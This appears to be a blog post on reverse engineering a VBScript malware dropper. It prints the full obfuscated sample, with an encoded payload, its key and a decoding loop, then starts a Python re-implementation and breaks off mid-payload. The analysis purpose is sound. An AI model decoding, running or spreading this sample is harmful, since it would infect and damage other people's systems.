Dissecting a Visual Basic Malware, a Hands-On Approach to Reverse Engineering
On January 5, 2022, my brother asked for my help in reverse engineering a strange malware that had infected his client's computer. As the new year began, he turned to me for assistance with this technical task.
dim tcWKOUISRPTCiyzFzuwhUqdhgKJCUQUsKUboqeWJpPeqmAOIkkIokOEOTRUSNdCqUibloruYy tcWKOUISRPTCiyzFzuwhUqdhgKJCUQUsKUboqeWJpPeqmAOIkkIokOEOTRUSNdCqUibloruYy = "ܖܲݞݓݔݓݑݨݥݎܱܟܠۼ۹ܾݝݔݡݡݞݡݡݔݢݤݜݔݝݔݧݣۼ۹ۼ۹ݙܬݐݡݡݐݨܗܑ݆݂ݒݡݘݟݣܝ݂ݗݔݛݛܑܛܑ݂ݒݡݘݟݣݘݝݖܝܵݘݛݔ݂ݨݢݣݔݜܾݑݙݔݒݣܑܛܑ݂ݗݔݛݛܝܰݟݟݛݘݒݐݣݘݞݝܑܛܑܼݘݒݡݞݢݞݕݣܝܑܼܻܷ݇݃݃ܿܘۼ۹ݖܬݐݡݡݐݨܗܑܑܷ݄ܺܲܛܑܑܷܻܼܺܛܑܷ݄ܺܲݥݦܟݡݜܑܛܑ݂ݞݕݣݦݐݡݔܼݘݒݡݞݢݞݕݣ݆ݘݝݓݞݦݢܲݤݡݡݔݝݣ݅ݔݡݢݘݞݝ݁ݤݝܑܛܑܷܻܼ݂ܾ݆ܴܺܵ݃ܰ݁ܲݛݐݢݢݔݢܑܛܑܴ݁ܶݎܑ݂݉ܛܑݓݔݕݐݤݛݣݘݒݞݝܑܘۼ۹ݨܬݐݡݡݐݨܗܑݦݘݝݜݖݜݣݢܩܑܛܑݦݘݝܢܡݎݛݞݖݘݒݐݛݓݘݢݚܑܛܑ݆ݘݝܢܡݎܾݟݔݡݐݣݘݝݖ݂ݨݢݣݔݜܑܛܑݦݘݝݜݖݜݣݢܩݛݞݒݐݛݗݞݢݣݡݞݞݣݢݔݒݤݡݘݣݨݒݔݝݣݔݡܑܛܑܰݝݣݘ݅ݘݡݤݢܿݡݞݓݤݒݣܑܘۼ۹ۼ۹ݕݤݝݒݣݘݞݝݖݞܗݜܘۼ۹ݘݕݜܬܣݣݗݔݝۼ۹݃ܬܑݦݘݝݜݖݜݣݢܩݛݞݒݐݛݗݞݢݣݡݞݞݣݢݔݒݤݡݘݣݨݒݔݝݣݔݡܑۼ۹݂ݔݣܱܬܶݔݣܾݑݙݔݒݣܗݨܗܢܘܘܝܸݝݢݣݐݝݒݔݢܾݕܗݨܗܣܘܘۼ۹ݕݞݡݔݐݒݗݐݘݝݑۼ۹ݖݞܬݐܝݓݘݢݟݛݐݨܽݐݜݔۼ۹ݔݧݘݣݕݞݡۼ۹ݝݔݧݣۼ۹݂ݔݣܱܬܶݔݣܾݑݙݔݒݣܗݨܗܢܘܕܑܡܑܘܝܸݝݢݣݐݝݒݔݢܾݕܗݨܗܣܘܘۼ۹ݕݞݡݔݐݒݗݐݘݝݑۼ۹ݖݞܬݐܝݓݘݢݟݛݐݨܽݐݜݔۼ۹ݔݧݘݣݕݞݡۼ۹ݝݔݧݣۼ۹ݘݕݖݞܬܑܑݣݗݔݝݖݞܬܑܽݞݣܜݕݞݤݝݓܑۼ۹ݔݛݢݔۼ۹݂ݔݣܱܬܶݔݣܾݑݙݔݒݣܗݨܗܟܘܘܝܸݝݢݣݐݝݒݔݢܾݕܗݨܗݜܘܘۼ۹ݕݞݡݔݐݒݗݐݘݝݑۼ۹ݘݕݜܬܠݣݗݔݝۼ۹ݖݞܬݐܝݥݞݛݤݜݔݢݔݡݘݐݛݝݤݜݑݔݡۼ۹ݔݛݢݔݘݕݜܬܡݣݗݔݝۼ۹ݖݞܬݐܝݒݐݟݣݘݞݝۼ۹ݔݝݓݘݕۼ۹ݔݧݘݣݕݞݡۼ۹ݝݔݧݣۼ۹ݔݝݓݘݕۼ۹ݔݝݓݕݤݝݒݣݘݞݝۼ۹ۼ۹ݢݔݣݦܬ݆݂ݒݡݘݟݣۼ۹ݢݔݣݢݗܬܲݡܗܟܘۼ۹ݢݔݣݕݢܬܲݡܗܠܘۼ۹ۼ۹ܵݤݝݒݣݘݞݝܲݡܗܽܘۼ۹݂ݔݣܲݡܬܲݡݔݐݣݔܾݑݙݔݒݣܗݙܗܽܘܘۼ۹ܴݝݓܵݤݝݒݣݘݞݝۼ۹ۼ۹ݕݤݝݒݣݘݞݝܴݧܗݢܘۼ۹ܴݧܬݢݗܝܴݧݟݐݝݓܴݝݥݘݡݞݝݜݔݝݣ݂ݣݡݘݝݖݢܗܑܔܑܕݢܕܑܔܑܘۼ۹ݔݝݓݕݤݝݒݣݘݞݝۼ۹ۼ۹ݕݤݝݒݣݘݞݝܿݣܗܲܛܰܘۼ۹ܿݣܬܑܑۼ۹݂ݔݣ݇ܬܲݡܗܢܘۼ۹݇ܝܾݟݔݝܑܑܾ݂ܿ݃ܛܑݗݣݣݟܩܞܞݗݞݤݢݣݡݘݚݞܝݓݨݝݤܝݝݔݣܩܦܦܤܣܞܑܕܲܛݕݐݛݢݔۼ۹݇ܝݢݔݣݡݔݠݤݔݢݣݗݔݐݓݔݡܑ݄ݢݔݡܜܰݖݔݝݣܩܑܛݝݕۼ۹݇ܝݢݔݝݓܰۼ۹ܿݣܬ݇ܝݡݔݢݟݞݝݢݔݣݔݧݣۼ۹ݔݝݓݕݤݝݒݣݘݞݝۼ۹ۼ۹ܵݤݝݒݣݘݞݝݝݕۼ۹ݝݕܬܑܑۼ۹ݘܬݖݞܗܠܘۼ۹ݢܬ݅ܽܕܑݎܑܕݘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݔݧܗܑܑܾܼ݄ܴܼܴܲܿ݃݁ܽܰܘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݔݧܗܑܑ݄݂ܴܼܴ݁ܽܰܘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݖݞܗܡܘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݖݞܗܣܘۼ۹ݝݕܬݝݕܕݢܕݒܕݒܕݝݣܕݒܕݤܕݒۼ۹ܴݝݓܵݤݝݒݣݘݞݝۼ۹ۼ۹݂ݤݑܽݢۼ۹ݞݝݔݡݡݞݡݡݔݢݤݜݔݝݔݧݣۼ۹ݓݡܬݔݧܗܑܰݟݟܳݐݣݐܑܘܕܲܕݦݝۼ۹ݕݢܝܲݞݟݨܵݘݛݔݕݤܛݓݡܛݣݡݤݔۼ۹ݢݗܝݡݤݝܑݢݒݗݣݐݢݚݢܞݒݡݔݐݣݔܞݢݒݜݘݝݤݣݔܞݜݞܠܞݣݝ݂ݚݨݟݔܞݣݡܑܕܲݗݡ݆ܗܢܣܘܕݓݡܛݕݐݛݢݔۼ۹ݢݗܝݡݔݖݦݡݘݣݔݖܗܟܘܕݖܗܢܘܕܑ݄݉݃ܺܟܼ݉ܡܑ݂݄ܛܲݗܕݓݡܕܲݗܛݖܗܤܘۼ۹ݕݢܝݒݞݟݨݕݘݛݔݕݤܛܲݡܗܡܘܝܽݐݜݔ݂ݟݐݒݔܗܕܷܦܘܝ݂ݔݛݕܝܿݐݣݗܕܲܕݦݝܛݣݡݤݔۼ۹ݔݝݓ݂ݤݑۼ۹ۼ۹ݓݡܬݔݧܗܑܰݟݟܳݐݣݐܑܘܕܲܕݦݝۼ۹ۼ۹ݢݤݑݢݟݡۼ۹ݞݝݔݡݡݞݡݡݔݢݤݜݔݝݔݧݣۼ۹ݕݞݡݔݐݒݗݓݡݘݝݕݢܝݓݡݘݥݔݢۼ۹ݓݟܬݓݡܝݟݐݣݗܕݒۼ۹ݘݕݓݡܝݘݢݡݔݐݓݨܬݣݡݤݔݣݗݔݝۼ۹ݘݕݓݡܝݓݡݘݥݔݣݨݟݔܬܠݣݗݔݝۼ۹ݕݢܝݒݞݟݨݕݘݛݔݕݤܛݓݟܕݦݝܛݣݡݤݔۼ۹ݘݕݕݢܝݕݘݛݔݔݧݘݢݣݢܗݓݟܕݦݝܘݣݗݔݝۼ۹ݕݢܝݖݔݣݕݘݛݔܗݓݟܕݦݝܘܝݐݣݣݡݘݑݤݣݔݢܬܡܚܣۼ۹ݔݝݓݘݕۼ۹ݕݞݡݔݐݒݗݕݘݘݝݕݢܝݖݔݣݕݞݛݓ
ݔݡܗݓݟܘܝݕݘݛݔݢۼ۹ݘݕݘݝݢݣݡܗݕݘܝݝݐݜݔܛܑܝܑܘݣݗݔݝۼ۹ݘݕݛݒݐݢݔܗݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘܗݤݑݞݤݝݓܗݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘܘܘܘܫܭܑݛݝݚܑݣݗݔݝۼ۹ݕݘܝݐݣݣݡݘݑݤݣݔݢܬܡܚܣۼ۹ݘݕݤݒݐݢݔܗݕݘܝݝݐݜݔܘܫܭݤݒݐݢݔܗݦݝܘݣݗݔݝۼ۹ݦݘݣݗݢݗܝݒݡݔݐݣݔݢݗݞݡݣݒݤݣܗݓݟܕݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘܗܟܘܕܑܝݛݝݚܑܘۼ۹ܝݦݘݝݓݞݦݢݣݨݛݔܬܦۼ۹ܝݣݐݡݖݔݣݟݐݣݗܬܑݒݜݓܝݔݧݔܑۼ۹ܝݐݡݖݤݜݔݝݣݢܬܑܞݒݢݣݐݡݣܑܕݡݔݟݛݐݒݔܗݦݝܛܑܑܛݒݗܕܑܑܕݒݗܘܕܑܕݢݣݐݡݣܑܕݡݔݟݛݐݒݔܗݕݘܝݝݐݜݔܛܑܑܛݒݗܕܑܑܕݒݗܘܕܑܕݔݧݘݣܑۼ۹ݕݘݒܬݢݗܝݡݔݖݡݔݐݓܗݖܗܣܘܕݢݗܝݡݔݖݡݔݐݓܗݖܗܣܘܕܑܝܑܕݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘܗݤݑݞݤݝݓܗݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘܘܘܕݒܘܕݖܗܥܘܘۼ۹ݘݕݘݝݢݣݡܗݘݒݞݝݛݞݒݐݣݘݞݝܛܑܛܑܘܬܟݣݗݔݝۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝܬݕݘܝݟݐݣݗۼ۹ݔݛݢݔۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝܬݕݘݒۼ۹ݔݝݓݘݕۼ۹ܝݢݐݥݔܗܘۼ۹ݔݝݓݦݘݣݗۼ۹ݔݝݓݘݕۼ۹ݔݝݓݘݕۼ۹ݔݝݓݘݕۼ۹ݝݔݧݣۼ۹ݕݞݡݔݐݒݗݕݞݘݝݕݢܝݖݔݣݕݞݛݓݔݡܗݓݟܘܝݢݤݑݕݞݛݓݔݡݢۼ۹ݕݞܝݐݣݣݡݘݑݤݣݔݢܬܡܚܣۼ۹ݦݘݣݗݢݗܝݒݡݔݐݣݔݢݗݞݡݣݒݤݣܗݓݟܕݕݞܝݝݐݜݔܕܑܝݛݝݚܑܘۼ۹ܝݦݘݝݓݞݦݢݣݨݛݔܬܦۼ۹ܝݣݐݡݖݔݣݟݐݣݗܬܑݒݜݓܝݔݧݔܑۼ۹ܝݐݡݖݤݜݔݝݣݢܬܑܞݒݢݣݐݡݣܑܕݡݔݟݛݐݒݔܗݦݝܛܑܑܛݒݗܕܑܑܕݒݗܘܕܑܕݢݣݐݡݣݔݧݟݛݞݡݔݡܑܕݡݔݟݛݐݒݔܗݕݞܝݝݐݜݔܛܑܑܛݒݗܕܑܑܕݒݗܘܕܑܕݔݧݘݣܑۼ۹ݕݘݒܬݢݗܝݡݔݖݡݔݐݓܗܑܷܻܼܺݢݞݕݣݦݐݡݔݒݛݐݢݢݔݢݕݞݛݓݔݡܑܕݖܗܥܘܘۼ۹ݘݕݘݝݢݣݡܗܝݘݒݞݝݛݞݒݐݣݘݞݝܛܑܛܑܘܬܟݣݗݔݝۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝܬݕݞܝݟݐݣݗۼ۹ݔݛݢݔۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝܬݕݘݒۼ۹ݔݝݓݘݕۼ۹ܝݢݐݥݔܗܘۼ۹ݔݝݓݦݘݣݗۼ۹ݝݔݧݣۼ۹ݔݝݓݘݕۼ۹ݔݝݓݘݕۼ۹ݝݔݧݣۼ۹ݔݡݡܝݒݛݔݐݡۼ۹ݔݝݓݢݤݑۼ۹ۼ۹ۼ۹ۼ۹ݥݝܬܑ݆ݘݝݓݞݦݢܑۼ۹݄ܬܑܑۼ۹ۼ۹ݒݗܬݒݗݡݦܗܢܣܘۼ۹ݒܬݒݗݡݦܗܨܡܘۼ۹ݕݤܬݦܝݢݒݡݘݟݣݕݤݛݛݝݐݜݔۼ۹ݦݝܬݦܝݢݒݡݘݟݣݝݐݜݔۼ۹ܽ݃ܬܑܽݞܑۼ۹ݘݕݕݢܝݕݘݛݔݔݧݘݢݣݢܗݔݧܗܑ݆ݘݝݓݘݡܑܘܕܑܼݘݒݡݞݢݞݕݣܝܴܽ݃ܵݡݐݜݔݦݞݡݚݥܡܝܟܝܤܟܦܡܦݥݑݒܝݔݧݔܑܘݣݗݔݝۼ۹ܽ݃ܬܑ݈ݔݢܑۼ۹ݔݝݓݘݕۼ۹ۼ۹݄ܬݢݗܝݡݔݖݡݔݐݓܗݖܗܡܘܘۼ۹ݘݕ݄ܬܑܑݣݗݔݝۼ۹ݘݕݜݘݓܗݕݤܛܡܘܬܑܩܑܕݦݝݣݗݔݝۼ۹݄ܬܑܑ݄ܴ݃݁ۼ۹ݢݗܝݡݔݖݦݡݘݣݔݖܗܡܘܛ݄ܛݖܗܤܘۼ۹ݔݛݢݔۼ۹݄ܬܑܑܻ݂ܴܵܰۼ۹ݢݗܝݡݔݖݦݡݘݣݔݖܗܡܘܛ݄ܛݖܗܤܘۼ۹ݔݝݓݘݕۼ۹ݔݝݓݘݕۼ۹ۼ۹ܽݢۼ۹ݢݟݛܬܑݫ݅ݫܑۼ۹ݦݗݘݛݔݣݡݤݔۼ۹ݢܬݢݟݛݘݣܗܿݣܗܑ݅ݡݔܑܛܑܑܘܛݢݟݛܘۼ۹ݢݔݛݔݒݣݒݐݢݔݢܗܟܘۼ۹ݒݐݢݔܑݔݧݒܑۼ۹ݢݐܬݢܗܠܘۼ۹ݔݧݔݒݤݣݔݢݐۼ۹ݒݐݢݔܑ݂ݒܑۼ۹ݢܡܬܴݧܗܑݣݔݜݟܑܘܕܑܑܕݢܗܡܘۼ۹ݢݔݣݦݡܬݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݢܡܛܡܛ݃ݡݤݔܘۼ۹ݦݡܝ݆ݡݘݣݔݢܗܠܘۼ۹ݦݡܝܲݛݞݢݔܗܘۼ۹ݢݗܝݡݤݝݢܡܛܥۼ۹ݒݐݢݔܑܑ݁ܵۼ۹ݢܡܬܴݧܗܑݣݔݜݟܑܘܕܑܑܕݢܗܡܘۼ۹ݢݔݣݦݡܬݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݢܡܛܡܛ݃ݡݤݔܘۼ۹ݦݡܝ݆ݡݘݣݔݢܗܠܘۼ۹ݦݡܝܲݛݞݢݔܗܘۼ۹ݢݗܝݡݤݝݢܡۼ۹ݒݐݢݔܑ݁ݔݝܑۼ۹ݢݔݣݦݡܬݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݕݤܛܠܘۼ۹ݕܬݦݡܝ݁ݔݐݓܰݛݛۼ۹ݦݡܝݒݛݞݢݔܗܘۼ۹ݕܬݡݔݟݛݐݒݔܗݕܛݒݗܕݥݝܕݒݗܛݒݗܕݢܗܠܘܕݒݗܘۼ۹ݢݔݣݦݡܬݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݕݤܛܡܛݕݐݛݢݔܘۼ۹ݦݡܝ݆ݡݘݣݔݕۼ۹ݦݡܝݒݛݞݢݔܗܘۼ۹ݒݐݢݔܑ݄ݟܑۼ۹ݢݔݣݦݡܬݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݕݤܛܡܛݕݐݛݢݔܘۼ۹ݢܗܠܘܬݡݔݟݛݐݒݔܗݢܗܠܘܛܑݫ݄ݫܑܛܑݫ݅ݫܑܘۼ۹ݦݡܝ݆ݡݘݣݔݢܗܠܘۼ۹ݦݡܝܲݛݞݢݔܗܘۼ۹ݢݗܝݡݤݝܑݦݢݒݡݘݟݣܝݔݧݔܞܞܑܱܕݒݗܕݕݤܕݒݗܛܥۼ۹ݦܝݠݤݘݣۼ۹ݒݐݢݔܑܲݛܑۼ۹݆ܝݠݤݘݣۼ۹ݒݐݢݔܑ݄ݝܑ
ۼ۹݂ܗܠܘܬݡݔݟݛݐݒݔܗ݂ܗܠܘܛܑܔݕܑܛݕݤܘۼ۹݂ܗܠܘܬݡݔݟݛݐݒݔܗ݂ܗܠܘܛܑܔݝܑܛݦݝܘۼ۹݂ܗܠܘܬݡݔݟݛݐݒݔܗ݂ܗܠܘܛܑܔݢݕݓݡܑܛݓݡܘۼ۹ݔݧݔݒݤݣݔ݂ܗܠܘۼ۹ݦܝݠݤݘݣۼ۹ݔݝݓݢݔݛݔݒݣۼ۹݆ܝ݂ݛݔݔݟܥܟܟܟۼ۹݂ݟݡۼ۹ݦݔݝݓ" QhabtGxPVSmqaodFuleiyhMdMORySQPKnEsCXZoecOhKXInmYYJkZyGiPdBJHiBTHICAOhhOzZhDBVFLYVGxNRf = "" Dim wVHjbbCiUkelksgSYsGkDSVRUNaCwPyrpLDfoKiLOSqLnUHvJGjedRiyUqBUCsCZpOtcggZk wVHjbbCiUkelksgSYsGkDSVRUNaCwPyrpLDfoKiLOSqLnUHvJGjedRiyUqBUCsCZpOtcggZk = 0 dim mvJPJeMCCsyxVAxhAqnBiKQdAlgucQMhQwYrMBrrThnhkbwYxQMGnhjAEaeNbNyLmxVJGchyPbsjkTGlVQkowDF mvJPJeMCCsyxVAxhAqnBiKQdAlgucQMhQwYrMBrrThnhkbwYxQMGnhjAEaeNbNyLmxVJGchyPbsjkTGlVQkowDF = 0 dim CSPCBHxJqYLpeDlsoMVtwtJREUYqwAUQgiZBRnxppFbMsrHCxajcaGGBEaKjPBpbfnRatfqhDmflLNKFLKlVpHl dim qwsUAtkNvyFxPLCTpPFcyKJalLKiStlbmCGZGEXTqqKbxqDxytkvmrpOgXcsMADtfKuaecbWffDJndqogONubFu CSPCBHxJqYLpeDlsoMVtwtJREUYqwAUQgiZBRnxppFbMsrHCxajcaGGBEaKjPBpbfnRatfqhDmflLNKFLKlVpHl = "HGFTYtdcyfsaty!@#FFDS" qwsUAtkNvyFxPLCTpPFcyKJalLKiStlbmCGZGEXTqqKbxqDxytkvmrpOgXcsMADtfKuaecbWffDJndqogONubFu = 0 do until mvJPJeMCCsyxVAxhAqnBiKQdAlgucQMhQwYrMBrrThnhkbwYxQMGnhjAEaeNbNyLmxVJGchyPbsjkTGlVQkowDF = len(CSPCBHxJqYLpeDlsoMVtwtJREUYqwAUQgiZBRnxppFbMsrHCxajcaGGBEaKjPBpbfnRatfqhDmflLNKFLKlVpHl) mvJPJeMCCsyxVAxhAqnBiKQdAlgucQMhQwYrMBrrThnhkbwYxQMGnhjAEaeNbNyLmxVJGchyPbsjkTGlVQkowDF = mvJPJeMCCsyxVAxhAqnBiKQdAlgucQMhQwYrMBrrThnhkbwYxQMGnhjAEaeNbNyLmxVJGchyPbsjkTGlVQkowDF + 1 qwsUAtkNvyFxPLCTpPFcyKJalLKiStlbmCGZGEXTqqKbxqDxytkvmrpOgXcsMADtfKuaecbWffDJndqogONubFu = qwsUAtkNvyFxPLCTpPFcyKJalLKiStlbmCGZGEXTqqKbxqDxytkvmrpOgXcsMADtfKuaecbWffDJndqogONubFu + AscW(mid(CSPCBHxJqYLpeDlsoMVtwtJREUYqwAUQgiZBRnxppFbMsrHCxajcaGGBEaKjPBpbfnRatfqhDmflLNKFLKlVpHl,mvJPJeMCCsyxVAxhAqnBiKQdAlgucQMhQwYrMBrrThnhkbwYxQMGnhjAEaeNbNyLmxVJGchyPbsjkTGlVQkowDF,1)) loop do until wVHjbbCiUkelksgSYsGkDSVRUNaCwPyrpLDfoKiLOSqLnUHvJGjedRiyUqBUCsCZpOtcggZk = Len(tcWKOUISRPTCiyzFzuwhUqdhgKJCUQUsKUboqeWJpPeqmAOIkkIokOEOTRUSNdCqUibloruYy) wVHjbbCiUkelksgSYsGkDSVRUNaCwPyrpLDfoKiLOSqLnUHvJGjedRiyUqBUCsCZpOtcggZk= 
wVHjbbCiUkelksgSYsGkDSVRUNaCwPyrpLDfoKiLOSqLnUHvJGjedRiyUqBUCsCZpOtcggZk + 1 QhabtGxPVSmqaodFuleiyhMdMORySQPKnEsCXZoecOhKXInmYYJkZyGiPdBJHiBTHICAOhhOzZhDBVFLYVGxNRf = QhabtGxPVSmqaodFuleiyhMdMORySQPKnEsCXZoecOhKXInmYYJkZyGiPdBJHiBTHICAOhhOzZhDBVFLYVGxNRf & ChrW(AscW(Mid(tcWKOUISRPTCiyzFzuwhUqdhgKJCUQUsKUboqeWJpPeqmAOIkkIokOEOTRUSNdCqUibloruYy, wVHjbbCiUkelksgSYsGkDSVRUNaCwPyrpLDfoKiLOSqLnUHvJGjedRiyUqBUCsCZpOtcggZk, 1)) - qwsUAtkNvyFxPLCTpPFcyKJalLKiStlbmCGZGEXTqqKbxqDxytkvmrpOgXcsMADtfKuaecbWffDJndqogONubFu + len(CSPCBHxJqYLpeDlsoMVtwtJREUYqwAUQgiZBRnxppFbMsrHCxajcaGGBEaKjPBpbfnRatfqhDmflLNKFLKlVpHl)) loop Wscript.Echo QhabtGxPVSmqaodFuleiyhMdMORySQPKnEsCXZoecOhKXInmYYJkZyGiPdBJHiBTHICAOhhOzZhDBVFLYVGxNRf
At first glance it looks encrypted. But the plain VBScript wrapped around the blob (dim, do until, AscW, Mid, ChrW, Wscript.Echo) shows it is only obfuscated: the huge string is the payload and the short string "HGFTYtdcyfsaty!@#FFDS" is the key. So I opened a new Python script and retyped the whole decoding loop with readable variable names to understand exactly what arithmetic it performs.
def mid(s, offset, amount):
    # VBScript Mid() is 1-based: Mid(s, 1, 1) is the first character
    return s[offset-1:offset+amount-1]

var5 = "HGFTYtdcyfsaty!@#FFDS"   # the "key" string from the dropper
var6 = 0
for x in range(1, len(var5)+1):
    var6 += ord(mid(var5, x, 1))   # sum of the key's character codes (1796 for this key)
var1 = "ܖܲݞݓݔݓݑݨݥݎܱܟܠۼ۹ܾݝݔݡݡݞݡݡݔݢݤݜݔݝݔݧݣۼ۹ۼ۹ݙܬݐݡݡݐݨܗܑ݆݂ݒݡݘݟݣܝ݂ݗݔݛݛܑܛܑ݂ݒݡݘݟݣݘݝݖܝܵݘݛݔ݂ݨݢݣݔݜܾݑݙݔݒݣܑܛܑ݂ݗݔݛݛܝܰݟݟݛݘݒݐݣݘݞݝܑܛܑܼݘݒݡݞݢݞݕݣܝܑܼܻܷ݇݃݃ܿܘۼ۹ݖܬݐݡݡݐݨܗܑܑܷ݄ܺܲܛܑܑܷܻܼܺܛܑܷ݄ܺܲݥݦܟݡݜܑܛܑ݂ݞݕݣݦݐݡݔܼݘݒݡݞݢݞݕݣ݆ݘݝݓݞݦݢܲݤݡݡݔݝݣ݅ݔݡݢݘݞݝ݁ݤݝܑܛܑܷܻܼ݂ܾ݆ܴܺܵ݃ܰ݁ܲݛݐݢݢݔݢܑܛܑܴ݁ܶݎܑ݂݉ܛܑݓݔݕݐݤݛݣݘݒݞݝܑܘۼ۹ݨܬݐݡݡݐݨܗܑݦݘݝݜݖݜݣݢܩܑܛܑݦݘݝܢܡݎݛݞݖݘݒݐݛݓݘݢݚܑܛܑ݆ݘݝܢܡݎܾݟݔݡݐݣݘݝݖ݂ݨݢݣݔݜܑܛܑݦݘݝݜݖݜݣݢܩݛݞݒݐݛݗݞݢݣݡݞݞݣݢݔݒݤݡݘݣݨݒݔݝݣݔݡܑܛܑܰݝݣݘ݅ݘݡݤݢܿݡݞݓݤݒݣܑܘۼ۹ۼ۹ݕݤݝݒݣݘݞݝݖݞܗݜܘۼ۹ݘݕݜܬܣݣݗݔݝۼ۹݃ܬܑݦݘݝݜݖݜݣݢܩݛݞݒݐݛݗݞݢݣݡݞݞݣݢݔݒݤݡݘݣݨݒݔݝݣݔݡܑۼ۹݂ݔݣܱܬܶݔݣܾݑݙݔݒݣܗݨܗܢܘܘܝܸݝݢݣݐݝݒݔݢܾݕܗݨܗܣܘܘۼ۹ݕݞݡݔݐݒݗݐݘݝݑۼ۹ݖݞܬݐܝݓݘݢݟݛݐݨܽݐݜݔۼ۹ݔݧݘݣݕݞݡۼ۹ݝݔݧݣۼ۹݂ݔݣܱܬܶݔݣܾݑݙݔݒݣܗݨܗܢܘܕܑܡܑܘܝܸݝݢݣݐݝݒݔݢܾݕܗݨܗܣܘܘۼ۹ݕݞݡݔݐݒݗݐݘݝݑۼ۹ݖݞܬݐܝݓݘݢݟݛݐݨܽݐݜݔۼ۹ݔݧݘݣݕݞݡۼ۹ݝݔݧݣۼ۹ݘݕݖݞܬܑܑݣݗݔݝݖݞܬܑܽݞݣܜݕݞݤݝݓܑۼ۹ݔݛݢݔۼ۹݂ݔݣܱܬܶݔݣܾݑݙݔݒݣܗݨܗܟܘܘܝܸݝݢݣݐݝݒݔݢܾݕܗݨܗݜܘܘۼ۹ݕݞݡݔݐݒݗݐݘݝݑۼ۹ݘݕݜܬܠݣݗݔݝۼ۹ݖݞܬݐܝݥݞݛݤݜݔݢݔݡݘݐݛݝݤݜݑݔݡۼ۹ݔݛݢݔݘݕݜܬܡݣݗݔݝۼ۹ݖݞܬݐܝݒݐݟݣݘݞݝۼ۹ݔݝݓݘݕۼ۹ݔݧݘݣݕݞݡۼ۹ݝݔݧݣۼ۹ݔݝݓݘݕۼ۹ݔݝݓݕݤݝݒݣݘݞݝۼ۹ۼ۹ݢݔݣݦܬ݆݂ݒݡݘݟݣۼ۹ݢݔݣݢݗܬܲݡܗܟܘۼ۹ݢݔݣݕݢܬܲݡܗܠܘۼ۹ۼ۹ܵݤݝݒݣݘݞݝܲݡܗܽܘۼ۹݂ݔݣܲݡܬܲݡݔݐݣݔܾݑݙݔݒݣܗݙܗܽܘܘۼ۹ܴݝݓܵݤݝݒݣݘݞݝۼ۹ۼ۹ݕݤݝݒݣݘݞݝܴݧܗݢܘۼ۹ܴݧܬݢݗܝܴݧݟݐݝݓܴݝݥݘݡݞݝݜݔݝݣ݂ݣݡݘݝݖݢܗܑܔܑܕݢܕܑܔܑܘۼ۹ݔݝݓݕݤݝݒݣݘݞݝۼ۹ۼ۹ݕݤݝݒݣݘݞݝܿݣܗܲܛܰܘۼ۹ܿݣܬܑܑۼ۹݂ݔݣ݇ܬܲݡܗܢܘۼ۹݇ܝܾݟݔݝܑܑܾ݂ܿ݃ܛܑݗݣݣݟܩܞܞݗݞݤݢݣݡݘݚݞܝݓݨݝݤܝݝݔݣܩܦܦܤܣܞܑܕܲܛݕݐݛݢݔۼ۹݇ܝݢݔݣݡݔݠݤݔݢݣݗݔݐݓݔݡܑ݄ݢݔݡܜܰݖݔݝݣܩܑܛݝݕۼ۹݇ܝݢݔݝݓܰۼ۹ܿݣܬ݇ܝݡݔݢݟݞݝݢݔݣݔݧݣۼ۹ݔݝݓݕݤݝݒݣݘݞݝۼ۹ۼ۹ܵݤݝݒݣݘݞݝݝݕۼ۹ݝݕܬܑܑۼ۹ݘܬݖݞܗܠܘۼ۹ݢܬ݅ܽܕܑݎܑܕݘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݔݧܗܑܑܾܼ݄ܴܼܴܲܿ݃݁ܽܰܘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݔݧܗܑܑ݄݂ܴܼܴ݁ܽܰܘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݖݞܗܡܘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݖݞܗܣܘۼ۹ݝݕܬݝݕܕݢܕݒܕݒܕݝݣܕݒܕݤܕݒۼ۹ܴݝݓܵݤݝݒݣݘݞݝۼ۹ۼ۹݂ݤݑܽݢۼ۹ݞݝݔݡݡݞݡݡݔݢݤݜݔݝݔݧݣۼ۹ݓݡܬݔݧܗܑܰݟݟܳݐݣݐܑܘܕܲܕݦݝۼ۹ݕݢܝܲݞݟݨܵݘݛݔݕݤܛݓݡܛݣݡݤݔۼ۹ݢݗܝݡݤݝܑݢݒݗݣݐݢݚݢܞݒݡݔݐݣݔܞݢݒݜݘݝݤݣݔܞݜݞܠܞݣݝ݂ݚݨݟݔܞݣݡܑܕܲݗݡ݆ܗܢܣܘܕݓݡܛݕݐݛݢݔۼ۹ݢݗܝݡݔݖݦݡݘݣݔݖܗܟܘܕݖܗܢܘܕܑ݄݉݃ܺܟܼ݉ܡܑ݂݄ܛܲݗܕݓݡܕܲݗܛݖܗܤܘۼ۹ݕݢܝݒݞݟݨݕݘݛݔݕݤܛܲݡܗܡܘܝܽݐݜݔ݂ݟݐݒݔܗܕܷܦܘܝ݂ݔݛݕܝܿݐݣݗܕܲܕݦݝܛݣݡݤݔۼ۹ݔݝݓ݂ݤݑۼ۹ۼ۹ݓݡܬݔݧܗܑܰݟݟܳݐݣݐܑܘܕܲܕݦݝۼ۹ۼ۹ݢݤݑݢݟݡۼ۹ݞݝݔݡݡݞݡݡݔݢݤݜݔݝݔݧݣۼ۹ݕݞݡݔݐݒݗݓݡݘݝݕݢܝݓݡݘݥݔݢۼ۹ݓݟܬݓݡܝݟݐݣݗܕݒۼ